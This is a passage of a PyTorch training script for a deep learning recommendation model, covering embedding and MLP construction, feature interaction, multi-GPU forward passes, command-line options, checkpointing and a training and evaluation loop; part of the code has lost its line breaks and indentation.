            mean = 0.0  # std_dev = np.sqrt(variance)
            std_dev = np.sqrt(2 / (m + n))  # np.sqrt(1 / m) # np.sqrt(1 / n)
            W = np.random.normal(mean, std_dev, size=(m, n)).astype(np.float32)
            std_dev = np.sqrt(1 / m)  # np.sqrt(2 / (m + 1))
            bt = np.random.normal(mean, std_dev, size=m).astype(np.float32)
            # approach 1
            LL.weight.data = torch.tensor(W, requires_grad=True)
            LL.bias.data = torch.tensor(bt, requires_grad=True)
            # approach 2
            # LL.weight.data.copy_(torch.tensor(W))
            # LL.bias.data.copy_(torch.tensor(bt))
            # approach 3
            # LL.weight = Parameter(torch.tensor(W),requires_grad=True)
            # LL.bias = Parameter(torch.tensor(bt),requires_grad=True)
            layers.append(LL)

            # construct sigmoid or relu operator
            if i == sigmoid_layer:
                layers.append(nn.Sigmoid())
            else:
                layers.append(nn.ReLU())

        # approach 1: use ModuleList
        # return layers
        # approach 2: use Sequential container to wrap all layers
        return torch.nn.Sequential(*layers)

    def create_emb(self, m, ln):
        """Build one embedding bag per table size in `ln`; `m` is the
        embedding dim (an int, or a per-table list when md_flag is set)."""
        emb_l = nn.ModuleList()
        for i in range(0, ln.size):
            n = ln[i]
            # construct embedding operator
            if self.qr_flag and n > self.qr_threshold:
                # quotient-remainder trick for very large tables
                EE = QREmbeddingBag(n, m, self.qr_collisions,
                                    operation=self.qr_operation,
                                    mode="sum", sparse=True)
            elif self.md_flag:
                # mixed-dimension trick: small tables get the base dim
                base = max(m)
                _m = m[i] if n > self.md_threshold else base
                EE = PrEmbeddingBag(n, _m, base)
                # use np initialization as below for consistency...
                W = np.random.uniform(
                    low=-np.sqrt(1 / n), high=np.sqrt(1 / n), size=(n, _m)
                ).astype(np.float32)
                EE.embs.weight.data = torch.tensor(W, requires_grad=True)
            else:
                EE = nn.EmbeddingBag(n, m, mode="sum", sparse=True)

                # initialize embeddings
                # nn.init.uniform_(EE.weight, a=-np.sqrt(1 / n), b=np.sqrt(1 / n))
                W = np.random.uniform(
                    low=-np.sqrt(1 / n), high=np.sqrt(1 / n), size=(n, m)
                ).astype(np.float32)
                # approach 1
                EE.weight.data = torch.tensor(W, requires_grad=True)
                # approach 2
                # EE.weight.data.copy_(torch.tensor(W))
                # approach 3
                # EE.weight = Parameter(torch.tensor(W),requires_grad=True)

            emb_l.append(EE)

        return emb_l

    def __init__(
        self,
        m_spa=None,
        ln_emb=None,
        ln_bot=None,
        ln_top=None,
        arch_interaction_op=None,
        arch_interaction_itself=False,
        sigmoid_bot=-1,
        sigmoid_top=-1,
        sync_dense_params=True,
        loss_threshold=0.0,
        ndevices=-1,
        qr_flag=False,
        qr_operation="mult",
        qr_collisions=0,
        qr_threshold=200,
        md_flag=False,
        md_threshold=200,
    ):
        super(DLRM_Net, self).__init__()

        # only build the network when all mandatory arch arguments are given;
        # otherwise this acts as a bare nn.Module
        if (
            (m_spa is not None)
            and (ln_emb is not None)
            and (ln_bot is not None)
            and (ln_top is not None)
            and (arch_interaction_op is not None)
        ):

            # save arguments
            self.ndevices = ndevices
            self.output_d = 0
            self.parallel_model_batch_size = -1
            self.parallel_model_is_not_prepared = True
            self.arch_interaction_op = arch_interaction_op
            self.arch_interaction_itself = arch_interaction_itself
            self.sync_dense_params = sync_dense_params
            self.loss_threshold = loss_threshold
            # create variables for QR embedding if applicable
            self.qr_flag = qr_flag
            if self.qr_flag:
                self.qr_collisions = qr_collisions
                self.qr_operation = qr_operation
                self.qr_threshold = qr_threshold
            # create variables for MD embedding if applicable
            self.md_flag = md_flag
            if self.md_flag:
                self.md_threshold = md_threshold
            # create operators
            # (for ndevices > 1 the embeddings are created by the caller and
            # distributed across GPUs in parallel_forward)
            if ndevices <= 1:
                self.emb_l = self.create_emb(m_spa, ln_emb)
            self.bot_l = self.create_mlp(ln_bot, sigmoid_bot)
            self.top_l = self.create_mlp(ln_top, sigmoid_top)

    def apply_mlp(self, x, layers):
        # approach 1: use ModuleList
        # for layer in layers:
        #     x = layer(x)
        # return x
        # approach 2: use Sequential container to wrap all layers
        return layers(x)

    def apply_emb(self, lS_o, lS_i, emb_l):
        # WARNING: notice that we are processing the batch at once. We implicitly
        # assume that the data is laid out such that:
        # 1. each embedding is indexed with a group of sparse indices,
        #   corresponding to a single lookup
        # 2. for each embedding the lookups are further organized into a batch
        # 3. for a list of embedding tables there is a list of batched lookups

        ly = []
        # for k, sparse_index_group_batch in enumerate(lS_i):
        for k in range(len(lS_i)):
            sparse_index_group_batch = lS_i[k]
            sparse_offset_group_batch = lS_o[k]

            # embedding lookup
            # We are using EmbeddingBag, which implicitly uses sum operator.
# --- continuation of DLRM_Net.apply_emb() (begins before this chunk) ---
# The embeddings are represented as tall matrices, with sum
# happening vertically across 0 axis, resulting in a row vector
E = emb_l[k]
V = E(sparse_index_group_batch, sparse_offset_group_batch)

ly.append(V)

# print(ly)
return ly

def interact_features(self, x, ly):
    """Combine the dense vector `x` with the embedding vectors `ly`
    either by pairwise dot products ("dot") or concatenation ("cat")."""
    if self.arch_interaction_op == "dot":
        # concatenate dense and sparse features
        (batch_size, d) = x.shape
        T = torch.cat([x] + ly, dim=1).view((batch_size, -1, d))
        # perform a dot product
        Z = torch.bmm(T, torch.transpose(T, 1, 2))
        # append dense feature with the interactions (into a row vector)
        # approach 1: all
        # Zflat = Z.view((batch_size, -1))
        # approach 2: unique
        _, ni, nj = Z.shape
        # approach 1: tril_indices
        # offset = 0 if self.arch_interaction_itself else -1
        # li, lj = torch.tril_indices(ni, nj, offset=offset)
        # approach 2: custom
        offset = 1 if self.arch_interaction_itself else 0
        li = torch.tensor([i for i in range(ni) for j in range(i + offset)])
        lj = torch.tensor([j for i in range(nj) for j in range(i + offset)])
        Zflat = Z[:, li, lj]
        # concatenate dense features and interactions
        R = torch.cat([x] + [Zflat], dim=1)
    elif self.arch_interaction_op == "cat":
        # concatenation features (into a row vector)
        R = torch.cat([x] + ly, dim=1)
    else:
        sys.exit(
            "ERROR: --arch-interaction-op="
            + self.arch_interaction_op
            + " is not supported"
        )

    return R

def forward(self, dense_x, lS_o, lS_i):
    # dispatch to the single-device or the multi-GPU implementation
    if self.ndevices <= 1:
        return self.sequential_forward(dense_x, lS_o, lS_i)
    else:
        return self.parallel_forward(dense_x, lS_o, lS_i)

def sequential_forward(self, dense_x, lS_o, lS_i):
    # process dense features (using bottom mlp), resulting in a row vector
    x = self.apply_mlp(dense_x, self.bot_l)
    # debug prints
    # print("intermediate")
    # print(x.detach().cpu().numpy())

    # process sparse features(using embeddings), resulting in a list of row vectors
    ly = self.apply_emb(lS_o, lS_i, self.emb_l)
    # for y in ly:
    #     print(y.detach().cpu().numpy())

    # interact features (dense and sparse)
    z = self.interact_features(x, ly)
    # print(z.detach().cpu().numpy())

    # obtain probability of a click (using top mlp)
    p = self.apply_mlp(z, self.top_l)

    # clamp output if needed
    if 0.0 < self.loss_threshold and self.loss_threshold < 1.0:
        z = torch.clamp(p, min=self.loss_threshold, max=(1.0 - self.loss_threshold))
    else:
        z = p

    return z

def parallel_forward(self, dense_x, lS_o, lS_i):
    ### prepare model (overwrite) ###
    # WARNING: # of devices must be >= batch size in parallel_forward call
    batch_size = dense_x.size()[0]
    ndevices = min(self.ndevices, batch_size, len(self.emb_l))
    device_ids = range(ndevices)
    # WARNING: must redistribute the model if mini-batch size changes(this is common
    # for last mini-batch, when # of elements in the dataset/batch size is not even
    if self.parallel_model_batch_size != batch_size:
        self.parallel_model_is_not_prepared = True

    if self.parallel_model_is_not_prepared or self.sync_dense_params:
        # replicate mlp (data parallelism)
        self.bot_l_replicas = replicate(self.bot_l, device_ids)
        self.top_l_replicas = replicate(self.top_l, device_ids)
        self.parallel_model_batch_size = batch_size

    if self.parallel_model_is_not_prepared:
        # distribute embeddings (model parallelism)
        t_list = []
        for k, emb in enumerate(self.emb_l):
            d = torch.device("cuda:" + str(k % ndevices))
            emb.to(d)
            t_list.append(emb.to(d))
        self.emb_l = nn.ModuleList(t_list)
        self.parallel_model_is_not_prepared = False

    ### prepare input (overwrite) ###
    # scatter dense features (data parallelism)
    # print(dense_x.device)
    dense_x = scatter(dense_x, device_ids, dim=0)
    # distribute sparse features (model parallelism)
    if (len(self.emb_l) != len(lS_o)) or (len(self.emb_l) != len(lS_i)):
        sys.exit("ERROR: corrupted model input detected in parallel_forward call")

    t_list = []
    i_list = []
    for k, _ in enumerate(self.emb_l):
        d = torch.device("cuda:" + str(k % ndevices))
        t_list.append(lS_o[k].to(d))
        i_list.append(lS_i[k].to(d))
    lS_o = t_list
    lS_i = i_list

    ### compute results in parallel ###
    # bottom mlp
    # WARNING: Note that the self.bot_l is a list of bottom mlp modules
    # that have been replicated across devices, while dense_x is a tuple of dense
    # inputs that has been scattered across devices on the first (batch) dimension.
    # The output is a list of tensors scattered across devices according to the
    # distribution of dense_x.
    x = parallel_apply(self.bot_l_replicas, dense_x, None, device_ids)
    # debug prints
    # print(x)

    # embeddings
    ly = self.apply_emb(lS_o, lS_i, self.emb_l)
    # debug prints
    # print(ly)

    # butterfly shuffle (implemented inefficiently for now)
    # WARNING: Note that at this point we have the result of the embedding lookup
    # for the entire batch on each device. We would like to obtain partial results
    # corresponding to all embedding lookups, but part of the batch on each device.
    # Therefore, matching the distribution of output of bottom mlp, so that both
    # could be used for subsequent interactions on each device.
    if len(self.emb_l) != len(ly):
        sys.exit("ERROR: corrupted intermediate result in parallel_forward call")

    t_list = []
    for k, _ in enumerate(self.emb_l):
        d = torch.device("cuda:" + str(k % ndevices))
        y = scatter(ly[k], device_ids, dim=0)
        t_list.append(y)
    # adjust the list to be ordered per device
    ly = list(map(lambda y: list(y), zip(*t_list)))
    # debug prints
    # print(ly)

    # interactions
    z = []
    for k in range(ndevices):
        zk = self.interact_features(x[k], ly[k])
        z.append(zk)
    # debug prints
    # print(z)

    # top mlp
    # WARNING: Note that the self.top_l is a list of top mlp modules that
    # have been replicated across devices, while z is a list of interaction results
    # that by construction are scattered across devices on the first (batch) dim.
    # The output is a list of tensors scattered across devices according to the
    # distribution of z.
p = parallel_apply(self.top_l_replicas, z, None, device_ids) ### gather the distributed results ### p0 = gather(p, self.output_d, dim=0) # clamp output if needed if 0.0 < self.loss_threshold and self.loss_threshold < 1.0: z0 = torch.clamp( p0, min=self.loss_threshold, max=(1.0 - self.loss_threshold) ) else: z0 = p0 return z0 def dash_separated_ints(value): vals = value.split('-') for val in vals: try: int(val) except ValueError: raise argparse.ArgumentTypeError( "%s is not a valid dash separated list of ints" % value) return value def dash_separated_floats(value): vals = value.split('-') for val in vals: try: float(val) except ValueError: raise argparse.ArgumentTypeError( "%s is not a valid dash separated list of floats" % value) return value if __name__ == "__main__": ### import packages ### import sys import argparse ### parse arguments ### parser = argparse.ArgumentParser( description="Train Deep Learning Recommendation Model (DLRM)" ) # model related parameters parser.add_argument("--arch-sparse-feature-size", type=int, default=2) parser.add_argument( "--arch-embedding-size", type=dash_separated_ints, default="4-3-2") # j will be replaced with the table number parser.add_argument( "--arch-mlp-bot", type=dash_separated_ints, default="4-3-2") parser.add_argument( "--arch-mlp-top", type=dash_separated_ints, default="4-2-1") parser.add_argument( "--arch-interaction-op", type=str, choices=['dot', 'cat'], default="dot") parser.add_argument("--arch-interaction-itself", action="store_true", default=False) # embedding table options parser.add_argument("--md-flag", action="store_true", default=False) parser.add_argument("--md-threshold", type=int, default=200) parser.add_argument("--md-temperature", type=float, default=0.3) parser.add_argument("--md-round-dims", action="store_true", default=False) parser.add_argument("--qr-flag", action="store_true", default=False) parser.add_argument("--qr-threshold", type=int, default=200) parser.add_argument("--qr-operation", 
type=str, default="mult") parser.add_argument("--qr-collisions", type=int, default=4) # activations and loss parser.add_argument("--activation-function", type=str, default="relu") parser.add_argument("--loss-function", type=str, default="mse") # or bce or wbce parser.add_argument( "--loss-weights", type=dash_separated_floats, default="1.0-1.0") # for wbce parser.add_argument("--loss-threshold", type=float, default=0.0) # 1.0e-7 parser.add_argument("--round-targets", type=bool, default=False) # data parser.add_argument("--data-size", type=int, default=1) parser.add_argument("--num-batches", type=int, default=0) parser.add_argument( "--data-generation", type=str, default="random" ) # synthetic or dataset parser.add_argument("--data-trace-file", type=str, default="./input/dist_emb_j.log") parser.add_argument("--data-set", type=str, default="kaggle") # or terabyte parser.add_argument("--raw-data-file", type=str, default="") parser.add_argument("--processed-data-file", type=str, default="") parser.add_argument("--data-randomize", type=str, default="total") # or day or none parser.add_argument("--data-trace-enable-padding", type=bool, default=False) parser.add_argument("--max-ind-range", type=int, default=-1) parser.add_argument("--data-sub-sample-rate", type=float, default=0.0) # in [0, 1] parser.add_argument("--num-indices-per-lookup", type=int, default=10) parser.add_argument("--num-indices-per-lookup-fixed", type=bool, default=False) parser.add_argument("--num-workers", type=int, default=0) parser.add_argument("--memory-map", action="store_true", default=False) # training parser.add_argument("--mini-batch-size", type=int, default=1) parser.add_argument("--nepochs", type=int, default=1) parser.add_argument("--learning-rate", type=float, default=0.01) parser.add_argument("--print-precision", type=int, default=5) parser.add_argument("--numpy-rand-seed", type=int, default=123) parser.add_argument("--sync-dense-params", type=bool, default=True) # inference 
parser.add_argument("--inference-only", action="store_true", default=False) # onnx parser.add_argument("--save-onnx", action="store_true", default=False) # gpu parser.add_argument("--use-gpu", action="store_true", default=False) # debugging and profiling parser.add_argument("--print-freq", type=int, default=1) parser.add_argument("--test-freq", type=int, default=-1) parser.add_argument("--test-mini-batch-size", type=int, default=-1) parser.add_argument("--test-num-workers", type=int, default=-1) parser.add_argument("--print-time", action="store_true", default=False) parser.add_argument("--debug-mode", action="store_true", default=False) parser.add_argument("--enable-profiling", action="store_true", default=False) parser.add_argument("--plot-compute-graph", action="store_true", default=False) # store/load model parser.add_argument("--save-model", type=str, default="") parser.add_argument("--load-model", type=str, default="") # mlperf logging (disables other output and stops early) parser.add_argument("--mlperf-logging", action="store_true", default=False) # stop at target accuracy Kaggle 0.789, Terabyte (sub-sampled=0.875) 0.8107 parser.add_argument("--mlperf-acc-threshold", type=float, default=0.0) # stop at target AUC Terabyte (no subsampling) 0.8025 parser.add_argument("--mlperf-auc-threshold", type=float, default=0.0) parser.add_argument("--mlperf-bin-loader", action='store_true', default=False) parser.add_argument("--mlperf-bin-shuffle", action='store_true', default=False) # LR policy parser.add_argument("--lr-num-warmup-steps", type=int, default=0) parser.add_argument("--lr-decay-start-step", type=int, default=0) parser.add_argument("--lr-num-decay-steps", type=int, default=0) args = parser.parse_args() if args.mlperf_logging: print('command line args: ', json.dumps(vars(args))) ### some basic setup ### np.random.seed(args.numpy_rand_seed) np.set_printoptions(precision=args.print_precision) torch.set_printoptions(precision=args.print_precision) 
torch.manual_seed(args.numpy_rand_seed) if (args.test_mini_batch_size < 0): # if the parameter is not set, use the training batch size args.test_mini_batch_size = args.mini_batch_size if (args.test_num_workers < 0): # if the parameter is not set, use the same parameter for training args.test_num_workers = args.num_workers use_gpu = args.use_gpu and torch.cuda.is_available() if use_gpu: torch.cuda.manual_seed_all(args.numpy_rand_seed) torch.backends.cudnn.deterministic = True device = torch.device("cuda", 0) ngpus = torch.cuda.device_count() # 1 print("Using {} GPU(s)...".format(ngpus)) else: device = torch.device("cpu") print("Using CPU...") ### prepare training data ### ln_bot = np.fromstring(args.arch_mlp_bot, dtype=int, sep="-") # input data if (args.data_generation == "dataset"): train_data, train_ld, test_data, test_ld = \ dp.make_criteo_data_and_loaders(args) nbatches = args.num_batches if args.num_batches > 0 else len(train_ld) nbatches_test = len(test_ld) ln_emb = train_data.counts # enforce maximum limit on number of vectors per embedding if args.max_ind_range > 0: ln_emb = np.array(list(map( lambda x: x if x < args.max_ind_range else args.max_ind_range, ln_emb ))) m_den = train_data.m_den ln_bot[0] = m_den else: # input and target at random ln_emb = np.fromstring(args.arch_embedding_size, dtype=int, sep="-") m_den = ln_bot[0] train_data, train_ld = dp.make_random_data_and_loader(args, ln_emb, m_den) nbatches = args.num_batches if args.num_batches > 0 else len(train_ld) ### parse command line arguments ### m_spa = args.arch_sparse_feature_size num_fea = ln_emb.size + 1 # num sparse + num dense features m_den_out = ln_bot[ln_bot.size - 1] if args.arch_interaction_op == "dot": # approach 1: all # num_int = num_fea * num_fea + m_den_out # approach 2: unique if args.arch_interaction_itself: num_int = (num_fea * (num_fea + 1)) // 2 + m_den_out else: num_int = (num_fea * (num_fea - 1)) // 2 + m_den_out elif args.arch_interaction_op == "cat": num_int = num_fea * 
m_den_out else: sys.exit( "ERROR: --arch-interaction-op=" + args.arch_interaction_op + " is not supported" ) arch_mlp_top_adjusted = str(num_int) + "-" + args.arch_mlp_top ln_top = np.fromstring(arch_mlp_top_adjusted, dtype=int, sep="-") # sanity check: feature sizes and mlp dimensions must match if m_den != ln_bot[0]: sys.exit( "ERROR: arch-dense-feature-size " + str(m_den) + " does not match first dim of bottom mlp " + str(ln_bot[0]) ) if args.qr_flag: if args.qr_operation == "concat" and 2 * m_spa != m_den_out: sys.exit( "ERROR: 2 arch-sparse-feature-size " + str(2 * m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) + " (note that the last dim of bottom mlp must be 2x the embedding dim)" ) if args.qr_operation != "concat" and m_spa != m_den_out: sys.exit( "ERROR: arch-sparse-feature-size " + str(m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) ) else: if m_spa != m_den_out: sys.exit( "ERROR: arch-sparse-feature-size " + str(m_spa) + " does not match last dim of bottom mlp " + str(m_den_out) ) if num_int != ln_top[0]: sys.exit( "ERROR: # of feature interactions " + str(num_int) + " does not match first dimension of top mlp " + str(ln_top[0]) ) # assign mixed dimensions if applicable if args.md_flag: m_spa = md_solver( torch.tensor(ln_emb), args.md_temperature, # alpha d0=m_spa, round_dim=args.md_round_dims ).tolist() # test prints (model arch) if args.debug_mode: print("model arch:") print( "mlp top arch " + str(ln_top.size - 1) + " layers, with input to output dimensions:" ) print(ln_top) print("# of interactions") print(num_int) print( "mlp bot arch " + str(ln_bot.size - 1) + " layers, with input to output dimensions:" ) print(ln_bot) print("# of features (sparse and dense)") print(num_fea) print("dense feature size") print(m_den) print("sparse feature size") print(m_spa) print( "# of embeddings (= # of sparse features) " + str(ln_emb.size) + ", with dimensions " + str(m_spa) + "x:" ) print(ln_emb) print("data (inputs and 
targets):") for j, (X, lS_o, lS_i, T) in enumerate(train_ld): # early exit if nbatches was set by the user and has been exceeded if nbatches > 0 and j >= nbatches: break print("mini-batch: %d" % j) print(X.detach().cpu().numpy()) # transform offsets to lengths when printing print( [ np.diff( S_o.detach().cpu().tolist() + list(lS_i[i].shape) ).tolist() for i, S_o in enumerate(lS_o) ] ) print([S_i.detach().cpu().tolist() for S_i in lS_i]) print(T.detach().cpu().numpy()) ndevices = min(ngpus, args.mini_batch_size, num_fea - 1) if use_gpu else -1 ### construct the neural network specified above ### # WARNING: to obtain exactly the same initialization for # the weights we need to start from the same random seed. # np.random.seed(args.numpy_rand_seed) dlrm = DLRM_Net( m_spa, ln_emb, ln_bot, ln_top, arch_interaction_op=args.arch_interaction_op, arch_interaction_itself=args.arch_interaction_itself, sigmoid_bot=-1, sigmoid_top=ln_top.size - 2, sync_dense_params=args.sync_dense_params, loss_threshold=args.loss_threshold, ndevices=ndevices, qr_flag=args.qr_flag, qr_operation=args.qr_operation, qr_collisions=args.qr_collisions, qr_threshold=args.qr_threshold, md_flag=args.md_flag, md_threshold=args.md_threshold, ) # test prints if args.debug_mode: print("initial parameters (weights and bias):") for param in dlrm.parameters(): print(param.detach().cpu().numpy()) # print(dlrm) if use_gpu: # Custom Model-Data Parallel # the mlps are replicated and use data parallelism, while # the embeddings are distributed and use model parallelism dlrm = dlrm.to(device) # .cuda() if dlrm.ndevices > 1: dlrm.emb_l = dlrm.create_emb(m_spa, ln_emb) # specify the loss function if args.loss_function == "mse": loss_fn = torch.nn.MSELoss(reduction="mean") elif args.loss_function == "bce": loss_fn = torch.nn.BCELoss(reduction="mean") elif args.loss_function == "wbce": loss_ws = torch.tensor(np.fromstring(args.loss_weights, dtype=float, sep="-")) loss_fn = torch.nn.BCELoss(reduction="none") else: 
sys.exit("ERROR: --loss-function=" + args.loss_function + " is not supported") if not args.inference_only: # specify the optimizer algorithm optimizer = torch.optim.SGD(dlrm.parameters(), lr=args.learning_rate) lr_scheduler = LRPolicyScheduler(optimizer, args.lr_num_warmup_steps, args.lr_decay_start_step, args.lr_num_decay_steps) ### main loop ### def time_wrap(use_gpu): if use_gpu: torch.cuda.synchronize() return time.time() def dlrm_wrap(X, lS_o, lS_i, use_gpu, device): if use_gpu: # .cuda() # lS_i can be either a list of tensors or a stacked tensor. # Handle each case below: lS_i = [S_i.to(device) for S_i in lS_i] if isinstance(lS_i, list) \ else lS_i.to(device) lS_o = [S_o.to(device) for S_o in lS_o] if isinstance(lS_o, list) \ else lS_o.to(device) return dlrm( X.to(device), lS_o, lS_i ) else: return dlrm(X, lS_o, lS_i) def loss_fn_wrap(Z, T, use_gpu, device): if args.loss_function == "mse" or args.loss_function == "bce": if use_gpu: return loss_fn(Z, T.to(device)) else: return loss_fn(Z, T) elif args.loss_function == "wbce": if use_gpu: loss_ws_ = loss_ws[T.data.view(-1).long()].view_as(T).to(device) loss_fn_ = loss_fn(Z, T.to(device)) else: loss_ws_ = loss_ws[T.data.view(-1).long()].view_as(T) loss_fn_ = loss_fn(Z, T.to(device)) loss_sc_ = loss_ws_ * loss_fn_ # debug prints # print(loss_ws_) # print(loss_fn_) return loss_sc_.mean() # training or inference best_gA_test = 0 best_auc_test = 0 skip_upto_epoch = 0 skip_upto_batch = 0 total_time = 0 total_loss = 0 total_accu = 0 total_iter = 0 total_samp = 0 k = 0 # Load model is specified if not (args.load_model == ""): print("Loading saved model {}".format(args.load_model)) if use_gpu: if dlrm.ndevices > 1: # NOTE: when targeting inference on multiple GPUs, # load the model as is on CPU or GPU, with the move # to multiple GPUs to be done in parallel_forward ld_model = torch.load(args.load_model) else: # NOTE: when targeting inference on single GPU, # note that the call to .to(device) has already happened ld_model 
= torch.load( args.load_model, map_location=torch.device('cuda') # map_location=lambda storage, loc: storage.cuda(0) ) else: # when targeting inference on CPU ld_model = torch.load(args.load_model, map_location=torch.device('cpu')) dlrm.load_state_dict(ld_model["state_dict"]) ld_j = ld_model["iter"] ld_k = ld_model["epoch"] ld_nepochs = ld_model["nepochs"] ld_nbatches = ld_model["nbatches"] ld_nbatches_test = ld_model["nbatches_test"] ld_gA = ld_model["train_acc"] ld_gL = ld_model["train_loss"] ld_total_loss = ld_model["total_loss"] ld_total_accu = ld_model["total_accu"] ld_gA_test = ld_model["test_acc"] ld_gL_test = ld_model["test_loss"] if not args.inference_only: optimizer.load_state_dict(ld_model["opt_state_dict"]) best_gA_test = ld_gA_test total_loss = ld_total_loss total_accu = ld_total_accu skip_upto_epoch = ld_k # epochs skip_upto_batch = ld_j # batches else: args.print_freq = ld_nbatches args.test_freq = 0 print( "Saved at: epoch = {:d}/{:d}, batch = {:d}/{:d}, ntbatch = {:d}".format( ld_k, ld_nepochs, ld_j, ld_nbatches, ld_nbatches_test ) ) print( "Training state: loss = {:.6f}, accuracy = {:3.3f} %".format( ld_gL, ld_gA * 100 ) ) print( "Testing state: loss = {:.6f}, accuracy = {:3.3f} %".format( ld_gL_test, ld_gA_test * 100 ) ) print("time/loss/accuracy (if enabled):") with torch.autograd.profiler.profile(args.enable_profiling, use_gpu) as prof: while k < args.nepochs: if k < skip_upto_epoch: continue accum_time_begin = time_wrap(use_gpu) if args.mlperf_logging: previous_iteration_time = None for j, (X, lS_o, lS_i, T) in enumerate(train_ld): if j == 0 and args.save_onnx: (X_onnx, lS_o_onnx, lS_i_onnx) = (X, lS_o, lS_i) if j < skip_upto_batch: continue if args.mlperf_logging: current_time = time_wrap(use_gpu) if previous_iteration_time: iteration_time = current_time - previous_iteration_time else: iteration_time = 0 previous_iteration_time = current_time else: t1 = time_wrap(use_gpu) # early exit if nbatches was set by the user and has been exceeded if 
nbatches > 0 and j >= nbatches: break ''' # debug prints print("input and targets") print(X.detach().cpu().numpy()) print([np.diff(S_o.detach().cpu().tolist() + list(lS_i[i].shape)).tolist() for i, S_o in enumerate(lS_o)]) print([S_i.detach().cpu().numpy().tolist() for S_i in lS_i]) print(T.detach().cpu().numpy()) ''' # forward pass Z = dlrm_wrap(X, lS_o, lS_i, use_gpu, device) # loss E = loss_fn_wrap(Z, T, use_gpu, device) ''' # debug prints print("output and loss") print(Z.detach().cpu().numpy()) print(E.detach().cpu().numpy()) ''' # compute loss and accuracy L = E.detach().cpu().numpy() # numpy array S = Z.detach().cpu().numpy() # numpy array T = T.detach().cpu().numpy() # numpy array mbs = T.shape[0] # = args.mini_batch_size except maybe for last A = np.sum((np.round(S, 0) == T).astype(np.uint8)) if not args.inference_only: # scaled error gradient propagation # (where we do not accumulate gradients across mini-batches) optimizer.zero_grad() # backward pass E.backward() # debug prints (check gradient norm) # for l in mlp.layers: # if hasattr(l, 'weight'): # print(l.weight.grad.norm().item()) # optimizer optimizer.step() lr_scheduler.step() if args.mlperf_logging: total_time += iteration_time else: t2 = time_wrap(use_gpu) total_time += t2 - t1 total_accu += A total_loss += L * mbs total_iter += 1 total_samp += mbs should_print = ((j + 1) % args.print_freq == 0) or (j + 1 == nbatches) should_test = ( (args.test_freq > 0) and (args.data_generation == "dataset") and (((j + 1) % args.test_freq == 0) or (j + 1 == nbatches)) ) # print time, loss and accuracy if should_print or should_test: gT = 1000.0 * total_time / total_iter if args.print_time else -1 total_time = 0 gA = total_accu / total_samp total_accu = 0 gL = total_loss / total_samp total_loss = 0 str_run_type = "inference" if args.inference_only else "training" print( "Finished {} it {}/{} of epoch {}, {:.2f} ms/it, ".format( str_run_type, j + 1, nbatches, k, gT ) + "loss {:.6f}, accuracy {:3.3f} %".format(gL, 
gA * 100) ) # Uncomment the line below to print out the total time with overhead # print("Accumulated time so far: {}" \ # .format(time_wrap(use_gpu) - accum_time_begin)) total_iter = 0 total_samp = 0 # testing if should_test and not args.inference_only: # don't measure training iter time in a test iteration if args.mlperf_logging: previous_iteration_time = None test_accu = 0 test_loss = 0 test_samp = 0 accum_test_time_begin = time_wrap(use_gpu) if args.mlperf_logging: scores = [] targets = [] for i, (X_test, lS_o_test, lS_i_test, T_test) in enumerate(test_ld): # early exit if nbatches was set by the user and was exceeded if nbatches > 0 and i >= nbatches: break t1_test = time_wrap(use_gpu) # forward pass Z_test = dlrm_wrap( X_test, lS_o_test, lS_i_test, use_gpu, device ) if args.mlperf_logging: S_test = Z_test.detach().cpu().numpy() # numpy array T_test = T_test.detach().cpu().numpy() # numpy array scores.append(S_test) targets.append(T_test) else: # loss E_test = loss_fn_wrap(Z_test, T_test, use_gpu, device) # compute loss and accuracy L_test = E_test.detach().cpu().numpy() # numpy array S_test = Z_test.detach().cpu().numpy() # numpy array T_test = T_test.detach().cpu().numpy() # numpy array mbs_test = T_test.shape[0] # = mini_batch_size except last A_test = np.sum((np.round(S_test, 0) == T_test).astype(np.uint8)) test_accu += A_test test_loss += L_test * mbs_test test_samp += mbs_test t2_test = time_wrap(use_gpu) if args.mlperf_logging: scores = np.concatenate(scores, axis=0) targets = np.concatenate(targets, axis=0) metrics = { 'loss' : sklearn.metrics.log_loss, 'recall' : lambda y_true, y_score: sklearn.metrics.recall_score( y_true=y_true, y_pred=np.round(y_score) ), 'precision' : lambda y_true, y_score: sklearn.metrics.precision_score( y_true=y_true, y_pred=np.round(y_score) ), 'f1' : lambda y_true, y_score: sklearn.metrics.f1_score( y_true=y_true, y_pred=np.round(y_score) ), 'ap' : sklearn.metrics.average_precision_score, 'roc_auc' : 
sklearn.metrics.roc_auc_score, 'accuracy' : lambda y_true, y_score: sklearn.metrics.accuracy_score( y_true=y_true, y_pred=np.round(y_score) ), # 'pre_curve' : sklearn.metrics.precision_recall_curve, # 'roc_curve' : sklearn.metrics.roc_curve, } # print("Compute time for validation metric : ", end="") # first_it = True validation_results = {} for metric_name, metric_function in metrics.items(): # if first_it: # first_it = False # else: # print(", ", end="") # metric_compute_start = time_wrap(False) validation_results[metric_name] = metric_function( targets, scores ) # metric_compute_end = time_wrap(False) # met_time = metric_compute_end - metric_compute_start # print("{} {:.4f}".format(metric_name, 1000 * (met_time)), # end="") # print(" ms") gA_test = validation_results['accuracy'] gL_test = validation_results['loss'] else: gA_test = test_accu / test_samp gL_test = test_loss / test_samp is_best = gA_test > best_gA_test if is_best: best_gA_test = gA_test if not (args.save_model == ""): print("Saving model to {}".format(args.save_model)) torch.save( { "epoch": k, "nepochs": args.nepochs, "nbatches": nbatches, "nbatches_test": nbatches_test, "iter": j + 1, "state_dict": dlrm.state_dict(), "train_acc": gA, "train_loss": gL, "test_acc": gA_test, "test_loss": gL_test, "total_loss": total_loss, "total_accu": total_accu, "opt_state_dict": optimizer.state_dict(), }, args.save_model, ) if args.mlperf_logging: is_best = validation_results['roc_auc'] > best_auc_test if is_best: best_auc_test = validation_results['roc_auc'] print( "Testing at - {}/{} of epoch {},".format(j + 1, nbatches, k) + " loss {:.6f}, recall {:.4f}, precision {:.4f},".format( validation_results['loss'], validation_results['recall'], validation_results['precision'] ) + " f1 {:.4f}, ap {:.4f},".format( validation_results['f1'], validation_results['ap'], ) + " auc {:.4f}, best auc {:.4f},".format( validation_results['roc_auc'], best_auc_test ) + " accuracy {:3.3f} %, best accuracy {:3.3f} %".format( 
